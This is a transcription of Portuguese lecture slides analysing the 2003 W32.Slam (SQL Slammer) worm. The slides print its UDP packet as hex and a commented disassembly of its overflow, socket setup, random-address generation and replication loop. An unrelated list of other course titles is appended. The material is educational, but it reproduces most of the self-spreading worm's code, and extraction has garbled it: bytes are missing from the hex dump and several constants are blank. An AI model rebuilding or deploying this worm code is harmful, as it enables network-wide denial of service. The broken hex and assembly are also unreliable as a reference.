Criptografia e Segurança das Comunicações. das Comunicações
|
|
- Ricardo Antunes de Mendonça
- 8 Há anos
- Visualizações:
Transcrição
1 Curiosidade, não faz parte da avaliação Criptografia e Segurança das Comunicações Análise do verme W32.Slam W32.Slam: 1/21 Introdução (1) O conceito de verme foi divulgado em Em 1988 foi lançado o Morris, o primeiro verme com grande impacto. A 25 janeiro de 2003 foi lançado o verme W32.Slam, também conhecido por Sapphire ou Slammer. Espalhou-se muito rapidamente por usar protocolo de transporte UDP. Registados enormes prejuízos 5 servidores DNS de topo bloqueados. Placa giratória da Continental Airlines em Newark/NJ teve de ser encerrada. Rede ATM do Bank of America com graves disrupções. Telemóveis da Coreia do Sul tornados inoperacionais. Ataque baseado na transposição da memória tampão, uma fraqueza do SQL Server. W32.Slam: 2/21
2 Introdução (2) Pacote ocupa apenas 404B. Cabeçalho IP Cabeçalho UDP cf e630 c0a c0a8 016a 049f 059a 0180 ac8d dc c9b0 42eb 0e ae ae dcc9 b042 b c9b e2fd e e64 6c6c c b65 726e f75 6e b b9 6c6c e f66 b f63 6b66 b974 6f e 64be 1810 ae42 8d45 d450 ff16 508d 45e0 508d 45f0 50ff 1650 be10 10ae 428b 1e8b 033d 558b ec be1c 10ae 42ff 16ff d031 c f b 81f d 45cc 508b 45c0 50ff 166a 116a 026a 02ff d050 8d45 c450 8b45 c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d 0c40 8d14 88c1 e204 01c2 c1e c28d d b46a 108d 45b c f d b45 50ff d6eb ca Código W32.Slam: 3/21 Cabeçalhos IP/UDP (1) A. Cabeçalho IP Campo Valor Significado Versão (4-IP), IHL (5), Tipo Serviço (0) Comprimento do datagrama 3 cf09 Identificação Bandeiras, offset TTL, Protocolo transporte (11-UDP) 6 e630 Checksum do cabeçalho 7 c0a80164 Endereço IP fonte 8 c0a8016a Endereço IP destino W32.Slam: 4/21
3 Cabeçalhos IP/UDP (2) B. Cabeçalho UDP Campo Valor Significado 1 049f Porto fonte 2 095a Porto destino (1434d - SQL server) Comprimento cabeçalho + dados (384B) 4 ac8d Checksum W32.Slam: 5/21 Código (1) Numa interrogação ao servidor SQL, envia-se 1. Código de interrogação Byte 0x04 2. Identificador da base de dados a interrogar, até 128B que deve ser terminada por 0x00. O W32.Slam não contém 0x00 por forma a transpor ( overflow ) a memória tampão. Depois do 0x04 são colocados 0x01 em número suficiente para acomodar o código do verme e alterar endereço de retorno da rotina do servidor SQL para o código do verme. Entre os 0x01 encontram-se dados inseridos por instruções executadas pelo código do verme. W32.Slam: 6/21
4 Código (2) O programa corre apenas em cima do Windows 32 com servidor SQL. Rotinas da API socket acedidas por bibliotecas dinâmicas (endereços nas tabela IAT). O programa é dividido em quatro etapas: 1. Reconstrução da memória tampão, designadamente para eliminar eventuais 0x00, para poder ser enviada em novo ataque. 2. Recolha de parâmetros para a pilha. 3. Abre um socket e tempo desde arranque do SO. 4. Ciclo infinito 1. Selecciona aleatoriamente endereço IP para novo alvo do ataque. 2. Replica pacote UDP. W32.Slam: 7/21 Código (2) C. Passo 1: Reconstruir buffer, para que possa ser enviado mais tarde no passo 4.2-ciclo sendto() 68DCC9B042 push 0x42b0c9dc ; insere 01h 96 vezes na pilha B mov eax,0x ; 31C9 xor ecx,ecx ; B118 mov cl,0x18 ; FIXUP_PAYLOAD: ; E2FD loop FIXUP_PAYLOAD ; Não pode usar MOV ecx,... porque código não pode conter 00 s! W32.Slam: 8/21
5 Código (3) Passo 2: Carregar parâmetros na pilha ; insere 04h na pilha (código de interrogação ao SQL server) ; 0x xor 0x = 0x xor eax,0x ; Não pode usar MOV eax,... porque código não pode conter 00 s! ; copia ESP para EBP, por forma a poder aceder aos dados inseridos na pilha 89E5 mov ebp,esp ; ; insere string kernel32.dll na pilha ECX ficou com 0 no loop 682E646C6C push dword '.dll' ; 68656C3332 push dword 'el23' ; 686B65726E push dword 'kern' ; W32.Slam: 9/21 Código (4) ; insere string GetTickCount na pilha 686F756E74 push dword 'ount' ; B43 push dword 'ickc' ; push dword 'GetT' ; ; insere string ws2_32.dll na pilha 66B96C6C mov cx, 'll' ; ECX superior continua com E64 push dword '32.d' ; F push dword 'ws2_' ; ; insere string socket na pilha 66B96574 mov cx, 'et' ; ECX superior continua com F636B push dword 'sock' ; W32.Slam: 10/21
6 Código (5) ; insere string sendto na pilha 66B9746F mov cx, 'to' ; ECX superior continua com E64 push dword 'send' ; ; call sqlsort:[iat]->loadlibrary("ws2_32.dll") BE1810AE42 mov esi, 42AE1018h ; endereço da sqlsort.dll na IAT 8D45D4 lea eax,[ebp-0x2c] ; endereço parâmetro "ws2_32.dll" FF16 call dword ptr [esi] ; no EAX está retorno de LoadLibrary ; (base de ws2_32) W32.Slam: 11/21 Código (6) ; call sqlsort:[iat]->loadlibrary("kernel32.dll") 8D45E0 lea eax,[ebp-0x20] ; endereço parâmetro GetTickCount 8D45F0 lea eax,[ebp-0x10] ; endereço parâmetro kernel32.dll FF16 call dword ptr [esi] ; no EAX está retorno de LoadLibrary ; (base de kernel 32) ; Procura entrada GetProcAddress na IAT (Import Address Table), que roda nas ; versões dll, comparando a assinatura dos primeiros 4Bytes. BE1010AE42 mov esi, 42AE1010h ; endereço base da IAT 8B1E mov ebx,[esi] ; ebx<- entrada IAT 8B03 mov eax,[ebx] ; eax<-4b de instruções 3D558BEC51 cmp eax,0x51ec8b55 ; assinatura de GetProcAddress? 7405 jz FOUND_IT ; BE1C10AE42 mov esi,0x42ae101c ; entrada IAT passa a GetProcAddress W32.Slam: 12/21
7 Código (7) Passo 3: Abrir socket e recolher tempo desde arranque do SO. FOUND_IT: ; GetProcAddress(kernel32_base,GetTickCount) FF16 call dword ptr [esi] ; ; GetTickCount() FFD0 call eax ; no EAX estão milisegundos ; desde o início sistema (para ; semente do gerador aleatório) ; carrega parâmetros para a pilha 31C9 xor ecx,ecx ; ecx<-0 Não pode usar MOV ecx,0 porque código não pode conter 00 s! salva semente W32.Slam: 13/21 Código (8) 81F B xor ecx,0x9b ; 0x9B xor 0x = 81F xor ecx,0x9b ; 0x9A ; (port=1234/ family=af_inet) ; GetProcAddress(ws2_32,socket) Não pode usar MOV ecx,... porque código não pode conter 00 s! 8D45CC lea eax,[ebp-0x34] ; endereço parâmetro socket 8B45C0 mov eax,[ebp-0x34] ; endereço base ws2_32 FF16 call dword ptr [esi] ; W32.Slam: 14/21
8 Código (9) ; socket(af_inet, SOCK_DGRAM,IPPROTO_UDP) 6A11 push 0x11h ; 6A02 push 0x02h ; 6A02 push 0x02h ; FFD0 call eax ; ; GetProcAddress(ws2_32,sendto) 8D45C4 lea eax,[ebp-0x3c] ; endereço parâmetro sendto 8B45C0 mov eax,[ebp-0x40] ; endereço base de ws2_32 FF16 call dword ptr [esi] ; 89C6 mov esi,eax ; W32.Slam: 15/21 Código (10) Passo 4.1: Seleccionar aleatoriamente um endereço IP Autor tentou usar o gerador congruente linear X n+1 = (214013X n ) mod 2 32 Na implementação cometeu 2 lapsos: Limpeza de ebx feita com OR, quando deve ser feita com XOR. Resultado: o sal é 0x ou 0x ! Incremento codificado por 0xffd9613c, equivalente a : a negação é complemento para 2, faltou adicionar 1! Usou instrução ADD, quando devia usar SUB por causa do valor negativo! Resultado: o incremento é sempre par! W32.Slam: 16/21
9 Código (11) 09DB or ebx,ebx ; 81F33C61D9FF xor ebx,0xffd9613c ; ebx<-0x ou 0x ; conforme versão dll PSEUDO_RAND_SEND: 8B45B4 mov eax,[ebp-0x4c] ; carrega semente ; determina novo endereço IP 8D0C40 lea ecx,[eax+eax*2] ; 8D1488 lea edx,[eax+ecx*4] ; C1E204 shl edx,0x4 ; 01C2 add edx,eax ; C1E208 shl edx,0x8 ; 29C2 sub edx,eax ; 8D0490 lea eax,[eax+edx*4] ; 01D8 add eax,ebx ; 8945B4 mov [ebp-0x4c],eax ; guarda novo endereço IP na ; estrutura sock_addr W32.Slam: 17/21 Código (12) Passo 4.2: Enviar pacote UDP ; sendto(sock,payload,376,0,sock_addr struct,16) 6A10 push 0x10h ; 8D45B0 lea eax,[ebp-0x50] ; carrega endereço sock_addr 31C9 xor ecx,ecx ; ecx<-0 Não pode usar MOV ecx,0 porque código não pode conter 00 s! 6681F17801 xor cx,0x178 ; comprimento carga = 376B 8D4503 lea eax,[ebp+0x3] ; endereço da carga 8B45AC mov eax,[ebp-0x54] ; FFD6 call esi ; ; fecha ciclo EBCA jmp PSEUDO_RAND_SEND W32.Slam: 18/21
10 Trafego gerado Devido ao ciclo curto e transporte pelo protocolo UDP, o trafego cresceu exponencialmente limitado apenas pela capacidade da rede. América do Norte 12:45 EST Asia Europa W32.Slam: 19/21 Combate (1) O W32.Slam foi rapidamente detectado pelo enorme incremento de tráfego. A inspecção do cabeçalho UDP permitiu identificar ao fim de 1 hora o porto de transmissão, tendo os supervidores da rede contactado administradores para fechar a porta. Depois todos os administradores instalaram o patch da Microsoft, que tinham sido previamente publicitado. Os restantes portos mantiveram-se operacionais sendo os serviços afectados apenas pela saturação de tráfego por parte dos pacotes UDP do W32.Slam. W32.Slam: 20/21
11 Combate (2) MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434! From: Michael Bacarella <mbac () netgraft com> Date: Sat, 25 Jan :11: I'm getting massive packet loss to various points on the globe. I am seeing a lot of these in my tcpdump output on each host. 02:06: > ms-sql-m: udp :06: > : icmp: udp port ms-sql-m unreachable [tos0xc0 It looks like there's a worm affecting MS SQL Server which is pingflooding addresses at some random sequence. All admins with access to routers should block port 1434 (ms-sql-m)! Everyone running MS SQL Server shut it the hell down or make sure it can't access the internet proper! I make no guarantees that this information is correct, test it out for yourself! -- Michael Bacarella 24/7 phone: Netgraft Corporation "unique technologies to empower your business" W32.Slam: 21/21
Redes Locais. Prof. Luiz Carlos B. Caixeta Ferreira
Redes Locais. Prof. Luiz Carlos B. Caixeta Ferreira 5. Ethernet 5.1 Introdução 5.2 LLC (Logical Link Control) 5.3 MAC (Media Access Control) 5.4 Sistemas de Endereçamento 5.5 Quadros Ethernet 5.6 Codificação
Leia maisInstruções funcionamento em 16 bits. 8B bytes W Mod 000 r/m
Instruções funcionamento em 6 bits 0 a bytes Mov BYTE PTR [BX], 06h 00 0W Mod 000 r/m 0000 00 0 0 0 8A 07 06 3 bytes 00 8B 07 06 00 4 bytes 00 0W Mod 000 r/m 000 00 0000 0000 Mov WORD PTR [BX], 06h Instruções
Leia maisProgramação ao nível da máquina. Operações lógicas e aritméticas
Programação ao nível da máquina Operações lógicas e aritméticas Operações lógicas e aritméticas Operações: aritméticas: add, sub, inc, dec, cmp lógicas: and, or, xor, not Realizadas pela ALU (Arithmetic
Leia maishttp://www.risesecurity.org Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org
Ataques Polimórficos Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org A idéia - Detectores de intrusos utilizam-se de assinaturas de ataques para identificação dos mesmos - Sistemas
Leia maisRedes de Computadores 2008 Primeiro Trabalho Analisador de Redes
Redes de Computadores 2008 Primeiro Trabalho Analisador de Redes Prof. Ronaldo Alves Ferreira 1 Descrição do Trabalho Analisadores de redes são ferramentas de enorme valor para a depuração de protocolos
Leia maisSoftware de Telecomunicações. Ferramentas de protecção. Prof RG Crespo Software de Telecomunicações Protecção : 1/15
Software de Telecomunicações Ferramentas de protecção Prof RG Crespo Software de Telecomunicações Protecção : 1/15 Detecção de virus (1) No mercado existem programas dedicado à detecção e erradicação de
Leia maisRedes de Computadores
Redes de Computadores CAMADA DE REDE DHCP NAT IPv6 Slide 1 Protocolo DHCP Protocolo de Configuração Dinâmica de Hospedeiros (Dynamic Host Configuration Protocol DHCP), RFC 2131; Obtenção de endereço de
Leia maisRedes de Computadores. Trabalho de Laboratório Nº2
Redes de Computadores Curso de Eng. Informática Curso de Eng. de Electrónica e Computadores Trabalho de Laboratório Nº2 Configuração de TCP/IP numa rede de computadores Utilização de Ipconfig, Ping e Tracert
Leia maisTeleprocessamento e Redes
Teleprocessamento e Redes Aula 23: (laboratório) 13 de julho de 2010 1 2 3 ICMP HTTP DNS TCP 4 nslookup Sumário Permite fazer requisições a um servidor DNS O nslookup envia uma requisição para o servidor,
Leia maisPing. O programa Ping, opção de record route e de timestamp.
Ping O programa Ping, opção de record route e de timestamp. Ping Testa se um outro terminal se encontra atingível O programa envia uma mensagem ICMP echo request para um terminal e espera por receber uma
Leia maisCapítulo 7 CAMADA DE TRANSPORTE
Capítulo 7 CAMADA DE TRANSPORTE SERVIÇO SEM CONEXÃO E SERVIÇO ORIENTADO À CONEXÃO Serviço sem conexão Os pacotes são enviados de uma parte para outra sem necessidade de estabelecimento de conexão Os pacotes
Leia maisAssembly na arquitetura IA-32 com NASM no Linux
Assembly na arquitetura IA-32 com NASM no Linux Prof. Dr. Luciano José Senger 1 Introdução A Figura 1 mostra os registradores principais para a arquitetura IA-32. Essa arquitetura trabalha com palavras
Leia mais1. Capturando pacotes a partir da execução do traceroute
Neste laboratório, iremos investigar o protocolo IP, focando o datagrama IP. Vamos fazê-lo através da analise de um trace de datagramas IP enviados e recebidos por uma execução do programa traceroute (o
Leia maisRedes de Computadores I - Protocolos de Controle: ICMP. por Helcio Wagner da Silva
Redes de Computadores I - Protocolos de Controle: ICMP por Helcio Wagner da Silva Introdução Na Internet, cada roteador opera de maneira autônoma X X X X 2 Introdução Infelizmente, nada funciona corretamente
Leia maisUNIVERSIDADE. Sistemas Distribuídos
UNIVERSIDADE Sistemas Distribuídos Ciência da Computação Prof. Jesus José de Oliveira Neto Comunicação Inter-Processos Sockets e Portas Introdução Sistemas distribuídos consistem da comunicação entre processos
Leia maisArquitetura TCP/IP. Parte VI Entrega de pacotes sem conexão (IP) Fabrízzio Alphonsus A. M. N. Soares
Arquitetura TCP/IP Parte VI Entrega de pacotes sem conexão (IP) Fabrízzio Alphonsus A. M. N. Soares Tópicos Conceitos Pacote (ou datagrama) IP Formato Campos do cabeçalho Encapsulamento Fragmentação e
Leia maisRedes. Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004
Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004 O ICMP - - é um protocolo que faz parte da pilha TCP/IP, enquadrando-se na camada de rede (nível
Leia maisAtaques para obtenção de informações
Ataques para obtenção de informações Técnicas: Dumpster diving ou Trashing Engenharia Social Eavesdropping ou Packet Sniffing Scanning War dialing Firewalking Ataques para obtenção de informações Dumpster
Leia maisArquitetura de Computadores. Prof. João Bosco Jr.
Arquitetura de Computadores Prof. João Bosco Jr. Unidade II Aula 1 Nível ISA Posicionado entre a microarquitetura e o SO Define a arquitetura (Conjunto de Instruções) É a interface entre o Software e o
Leia maisCAPÍTULO 7 NÍVEL DE LINGUAGEM DE MONTAGEM
CAPÍTULO 7 NÍVEL DE LINGUAGEM DE MONTAGEM 71 Introdução Difere dos níveis inferiores por ser implementado por tradução A tradução é usada quando um processador está disponível para uma mensagem fonte mas
Leia maisProgramação 2008/2009 MEEC Guia de instalação do PC de programação
Programação 2008/2009 MEEC Guia de instalação do PC de programação Requisitos: PC 1Gbyte de memória Windows, Linux ou Mac OS X. Aplicação Virtualbox. (www.virtualbox.org) O uso de máquinas virtuais permite
Leia maisGuia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro
Guia de Instalação SIAM Internet Information Services - IIS 5.1 no Windows XP Pro Documento Gerado por: Amir Bavar Criado em: 06/04/2007 Última modificação: 26/09/2008 Índice: 1. Introdução 2. Lista de
Leia maisPeriféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 11
Sumário: O disco rígido e a disquete estrutura física. Como os dados são armazenados fisicamente. Como o MS-DOS organiza o disco. O registo de boot. Aula Teórica 11 Leitura Recomendada: Capítulos 28 e
Leia maisOneTouch ZOOM Pro Diabetes Management Software. Guia de Instalação. Procedimento de instalação
OneTouch ZOOM Pro Diabetes Management Software com SnapShot Guia de Instalação Procedimento de instalação 1. Insira o CD de instalação do OneTouch Zoom Pro na unidade de CD-ROM. NOTA: Se instalar o programa
Leia maisICMP Internet Control Message Protocol
TCP UDP ICMP Internet Control Message Protocol ARP IP ICMP Acesso à rede Funcionalidade Mensagens ICMP Internet Control Message Protocol - ICMP Funcionalidades Informar máquina de origem da ocorrência
Leia maisArquitetura de Computadores. Tipos de Instruções
Arquitetura de Computadores Tipos de Instruções Tipos de instruções Instruções de movimento de dados Operações diádicas Operações monádicas Instruções de comparação e desvio condicional Instruções de chamada
Leia maisIntrodução à Arquitetura e Linguagem Assembly de Processadores IA-32
Introdução à Arquitetura e Linguagem Assembly de Processadores IA-32 Sistemas da Computação Prof. Rossano Pablo Pinto, Msc. rossano at gmail com 2 semestre 2007 CHIP Ano MHz Transistors Mem 8086 1978 5
Leia maisRedes de Computadores II
Redes de Computadores II UDP Prof: Ricardo Luís R. Peres Tem como objetivo prover uma comunicação entre dois processos de uma mesma sessão que estejam rodando em computadores dentro da mesma rede ou não.
Leia maisA arquitectura IA32. A arquitectura de um processador é caracterizada pelo conjunto de atributos que são visíveis ao programador.
A arquitectura IA32 A arquitectura de um processador é caracterizada pelo conjunto de atributos que são visíveis ao programador. Tamanho da palavra Número de registos visíveis Número de operandos Endereçamento
Leia maisRedes de Computadores I Licenciatura em Eng. Informática e de Computadores 1 o Semestre, 26 de Outubro de 2005 1 o Teste A
Redes de Computadores I Licenciatura em Eng. Informática e de Computadores 1 o Semestre, 26 de Outubro de 2005 1 o Teste A Número: Nome: Duração: 1 hora O teste é sem consulta O teste deve ser resolvido
Leia maisRedes de Computadores
Redes de Computadores Prof. Marcelo Gonçalves Rubinstein Programa de Pós-Graduação em Engenharia Eletrônica Faculdade de Engenharia Universidade do Estado do Rio de Janeiro Ementa Introdução a Redes de
Leia maisLABORATÓRIO DE LINGUAGEM DE MONTAGEM INTERRUPÇÕES DO DOS E DA BIOS
LABORATÓRIO DE LINGUAGEM DE MONTAGEM INTERRUPÇÕES DO DOS E DA BIOS Capítulo 15 do livro-texto, págs. 309 a 330 Impressora Scanner Monitor Flop Disk Modem Floppy drive "CPU" HD CD ROM Teclado Mouse Dispositivos
Leia maisRedes de Computadores. Trabalho de Laboratório Nº7
Redes de Computadores Curso de Eng. Informática Curso de Eng. de Electrónica e Computadores Trabalho de Laboratório Nº7 Análise do tráfego na rede Protocolos TCP e UDP Objectivo Usar o Ethereal para visualizar
Leia maisLaboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly
Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly Gustavo G. Parma Lista dos comandos assembly que serão utilizados ao longo das práticas. 1 Comandos 1. ADD destino, fonte
Leia maisProtocolos, DNS, DHCP, Ethereal e comandos em Linux
Redes de Computadores Protocolos, DNS, DHCP, Ethereal e comandos em Linux Escola Superior de Tecnologia e Gestão Instituto Politécnico de Bragança Março de 2006 Endereços e nomes Quaisquer duas estações
Leia maisLicenciatura em Eng.ª Informática Complementos de Redes - 3º Ano - 2º Semestre. Trabalho Nº 4 - VoIP
Trabalho Nº 4 - VoIP 1. Introdução A utilização de tecnologia VoIP como alternativa às redes telefónicas tradicionais está a ganhar cada vez mais a aceitação junto dos utilizadores, e está sobretudo em
Leia mais- O MySQL para além da sua utilização em modo linha de comandos, também pode ser utilizado através de ferramentas gráficas.
Objetivo: Utilização das ferramentas gráficas do MySQL Instalação das ferramentas gráficas do MySQL: - O MySQL para além da sua utilização em modo linha de comandos, também pode ser utilizado através de
Leia maisSistemas Operacionais. Prof. M.Sc. Sérgio Teixeira. Aula 03 Conceitos de Hardware e Software parte 01. Cursos de Computação
Cursos de Computação Sistemas Operacionais Prof. M.Sc. Sérgio Teixeira Aula 03 Conceitos de Hardware e Software parte 01 Referência: MACHADO, F.B. ; MAIA, L.P. Arquitetura de Sistemas Operacionais. 4.ed.
Leia maisSEG. EM SISTEMAS E REDES. 03. Vulnerabilidades em redes. Prof. Ulisses Cotta Cavalca <ulisses.cotta@gmail.com>
SEG. EM SISTEMAS E REDES 03. Vulnerabilidades em redes Prof. Ulisses Cotta Cavalca Belo Horizonte/MG 2015 SUMÁRIO 1) Vulnerabilidades em redes 2) Dicionário de vulnerabilidades
Leia maisRedes de Computadores
8. Segurança de Rede DIN/CTC/UEM 2008 : o que é? Dispositivo que permite conectividade segura entre redes (interna e externa) com vários graus de confiabilidade Utilizado para implementar e impor as regras
Leia maisWireshark Lab: IP. Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2011 BATISTA, O. M. N. Tradução e adaptação para Wireshark.
Wireshark Lab: IP Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2011 BATISTA, O. M. N. Tradução e adaptação para Wireshark. Neste laboratório, investigaremos o Internet Protocol
Leia maisArquitectura de Computadores II. Medição de desempenho
Arquitectura de Computadores II LESI - 3º Ano Medição de desempenho João Luís Ferreira Sobral Departamento do Informática Universidade do Minho Abril 2002 1. Introdução A medição de desempenho pretende
Leia maisComponentes de um sistema de firewall - I
Componentes de um sistema de firewall - I O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um único elemento de software instalado num
Leia maisMANUAL DE INSTALAÇÃO E PROGRAMAÇÃO CONVERSOR - IP / USB / SERIAL - 317 RV1
MANUAL DE INSTALAÇÃO E PROGRAMAÇÃO CONVERSOR - IP / USB / SERIAL - 317 RV1 SÃO CAETANO DO SUL 06/06/2014 SUMÁRIO Descrição do Produto... 3 Características... 3 Configuração USB... 4 Configuração... 5 Página
Leia maisSoftware de segurança em redes para monitoração de pacotes em uma conexão TCP/IP
Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP Paulo Fernando da Silva psilva@senior.com.br Sérgio Stringari stringari@furbbr Resumo. Este artigo apresenta a especificação
Leia maisProgramação de Sockets em C/C++
Programação de Sockets em C/C++ Redes de Comunicação 2011/2012 1 Programação de Sockets em C/C++ 2 TCP 3 UDP Introdução Os sockets são um método de criar conexão entre processos, independente do protocolo.
Leia maisFernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br
ADMINISTRAÇÃO TCP/IP Fernando Albuquerque 061-2733589 fernando@cic.unb.br Protocolos TCP/IP - Tópicos Introdução IP Endereçamento Roteamento UDP, TCP Telnet, FTP Correio DNS Web Firewalls Protocolos TCP/IP
Leia maisCONSTRUÇÃO DE UMA UCP HIPOTÉTICA M++ INTRODUÇÃO
CONSTRUÇÃO DE UMA UCP HIPOTÉTICA M++ INTRODUÇÃO O seguinte artigo apresenta uma UCP hipotética construída no software simulador DEMOWARE Digital Works 3.04.39. A UCP (Unidade Central de Processamento)
Leia maisUsando o Nmap. A instalação do Nmap é bem simples. Após obter o código fonte execute os comandos abaixo: tar xjvpf nmap-3.48.tar.bz2 cd nmap-3.
Usando o Nmap Este artigo irá explicar como instalar e utilizar algumas funções do Nmap. Todos os comandos foram testados com a versão 3.48 do Nmap. É bem provável que alguns comandos não funcionem em
Leia maisCurso de especialização em Teleinformática Disciplina Sistemas Distribuídos Prof. Tacla
- 1 - - 2 - COMUNICAÇÃO INTER PROCESSOS DISTRIBUÍDOS. - 3 - - 4 - Os sockets UDP e TCP são a interface provida pelos respectivos protocolos. Pode-se dizer que estamos no middleware de sistemas distribuídos
Leia maisPÉGASUS (ETHERNET POCKET) STUDIO V1.00 MANUAL DE INSTALAÇÃO E OPERAÇÃO
PÉGASUS (ETHERNET POCKET) STUDIO V1.00 MANUAL DE INSTALAÇÃO E OPERAÇÃO Rua Coronel Botelho, 64 - Alto da Lapa - CEP: 05088-020 São Paulo - SP - Brasil +55 (11) 3832-6102 PÉGASUS (ETHERNET POCKET) STUDIO
Leia maisEvolução dos Processadores
Evolução dos Processadores Arquitetura Intel Arquitetura x86 Micro Arquitetura P5 P6 NetBurst Core Processador Pentium Pentium Pro Pentium II Pentium III Pentium 4 Pentium D Xeon Xeon Sequence Core 2 Duo
Leia maisGIAE VERSÃO 2.1.1 28 JUNHO DE 2011 MUITO IMPORTANTE
GIAE VERSÃO 2.1.1 28 JUNHO DE 2011 MUITO IMPORTANTE Devido a um bug detectado no motor da base de dados, situação agora corrigida pelo fabricante, esta nova actualização do GIAE é disponibilizada numa
Leia maisProgramação com sockets (em Java)
com sockets (em Java) Prof. Dr. Julio Arakaki Depto. Ciência da 1 Comunicação entre processos // aplicações - é um dos mecanismos mais utilizados - Java oferece modos de utilização:. TCP ( Transmission
Leia maisECD1200 Equipamento de Consulta de Dados KIT DE DESENVOLVIMENTO
Equipamento de Consulta de Dados KIT DE DESENVOLVIMENTO Versão do documento: 1.1 1. Introdução...3 2. Documentação...3 2.1. DOCUMENTAÇÃO DE REFERÊNCIA... 3 2.2. DESCRIÇÃO FUNCIONAL... 4 2.2.1. INTERFACE...
Leia maisInterconexão de Redes Parte 2. Prof. Dr. S. Motoyama
Interconexão de Redes Parte 2 Prof. Dr. S. Motoyama 1 Software IP nos hosts finais O software IP nos hosts finais consiste principalmente dos seguintes módulos: Camada Aplicação; DNS (Domain name system)
Leia maisCriptografia e Segurança de Comunicações. Comunicações SPAM
Curiosidade, não faz parte da avaliação Criptografia e Segurança de Comunicações SPAM SPAM : 1/10 SPAM introdução (1) SPAM 1 mensagem Email não solicitada, dividida por Boato ( Hoax ): história falsa para
Leia mais18/05/2014. Problemas atuais com o IPv4
Problemas atuais com o IPv4 Fundamentos de Redes de Computadores Prof. Marcel Santos Silva Falhas de segurança: A maioria dos ataques contra computadores hoje na Internet só é possível devido a falhas
Leia mais1 Ajuda da Internet M vel Clix
1 Ajuda da Internet M vel Clix Descrição geral Esta aplicação permite Ligar/Desligar por intermédio de uma PC Card / Modem USB. Janela principal da Internet M vel Clix Indica o estado de roaming Minimizes
Leia maisFAQ s ELEVATION Express
FAQ s ELEVATION Express PRIMAVERA Business Software Solutions Contents FAQ s... 3 2 FAQ s 1. Como configurar Motivos de Isenção Diferentes por artigo na mesma FA? 1º Criar novos Tipos de Imposto para cada
Leia maisProfessor: Dr. Rogério Rodrigues de Vargas.
UNIVERSIDADE ESTADUAL DE SANTA CRUZ DEPARTAMENTO DE CIÊNCIAS EXATAS E TECNOLÓGICAS Bacharelado em Ciência da Computação Software Básico Linguagem de Programação Assembly: Uma introdução no Linux/i386 (AT&T)
Leia maisProtocolo Ethernet e Dispositivos de Interconexão de LANs
Protocolo Ethernet e Dispositivos de Interconexão de LANs Prof. Rafael Guimarães Redes de Alta Velocidade Tópico 4 - Aula 1 Tópico 4 - Aula 1 Rafael Guimarães 1 / 31 Sumário Sumário 1 Motivação 2 Objetivos
Leia maisgenérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes
FIREWALLS Firewalls Definição: Termo genérico utilizado para designar um tipo de proteção de rede que restringe o acesso a certos serviços de um computador ou rede de computadores pela filtragem dos pacotes
Leia maisComponentes básicos de um sistema computacional. Cap. 1 (Stallings)
Componentes básicos de um sistema computacional Cap. 1 (Stallings) 1 Sistema de Operação Explora recursos de hardware de um ou mais processadores Provê um conjunto de serviços aos utilizadores Gerencia
Leia maisGestor de Janelas Gnome
6 3 5 Gestor de Janelas Gnome Nesta secção será explicado o funcionamento de um dos ambientes gráficos disponíveis no seu Linux Caixa Mágica, o Gnome. Na figura 5.1 apresentamos o GDM, o sistema gráfico
Leia maisOlho por olho, e o mundo acabará cego. Mohandas Gandhi
Sockets Olho por olho, e o mundo acabará cego. Mohandas Gandhi Conectando-se a máquinas remotas. Protocolo Da necessidade de dois computadores se comunicarem surgiram diversos protocolos que permitissem
Leia maisNível da Arquitetura do Conjunto das Instruções
Nível da Arquitetura do Conjunto das Instruções (Aula 13) Fluxo de Controle Fluxo Seqüencial de Controle e Desvios (1) Fluxo de Controle: É a seqüência na qual instruções são dinamicamente executadas Isto
Leia maisUNIVERSIDADE CATÓLICA PORTUGUESA
UNIVERSIDADE CATÓLICA PORTUGUESA WebShare Serviço de partilha de ficheiros via WebDAV versão: 2.0.3 Nelson Rodrigues Direcção de Sistemas de Informação 28-10-2010 ÍNDICE: Introdução... 3 Requisitos...
Leia maisAmbiente de trabalho. Configurações. Acessórios
Ambiente de trabalho Configurações Acessórios O Sistema Operativo (SO) é o conjunto de programas fundamentais que permitem que o computador funcione e comunique com o exterior. Actualmente, o Windows é
Leia maisEndereço IP Privado. Endereçamento IP. IP Protocolo da Internet. Protocolos da. Camada de Inter-Rede (Internet)
Protocolos da Camada de Inter- (Internet) IP Protocolo da Internet. Não Confiável; Não Orientado à conexão; Trabalha com Datagramas; Roteável; IPv 4 32 bits; IPv 6 128 bits; Divisão por Classes (A,B,C,D,E);
Leia maisPRIMAVERA EXPRESS: Funcionalidades do Produto
PRIMAVERA EXPRESS: Funcionalidades do Produto Como efetuo a mudança de ano do Ponto de Venda? No Programa Express aceda a Tabelas Pontos de Venda Postos de Venda abrir o separador Movimentos Caixa e: -
Leia maisEntradas/Saídas. Programação por interrupções Conceitos gerais Programação da porta série Transmissão
Entradas/Saídas Programação por interrupções Conceitos gerais Programação da porta série Transmissão Problemas a resolver Como identificar a interrupção? Motivo da interrupção Que rotina executar? Como
Leia maisRelatório do 2º Guião Laboratorial de Avaliação: Encaminhamento de pacotes. Licenciatura: ETI Turma : ETC1 Grupo : rd2_t3_02 Data: 30/10/2009
Licenciaturas em Informática e Gestão de Empresas, Engenharia de Telecomunicações e Informática e Engenharia Informática Redes Digitais II Relatório do 2º Guião Laboratorial de Avaliação: Encaminhamento
Leia maisRedes de Computadores 1 o Exame
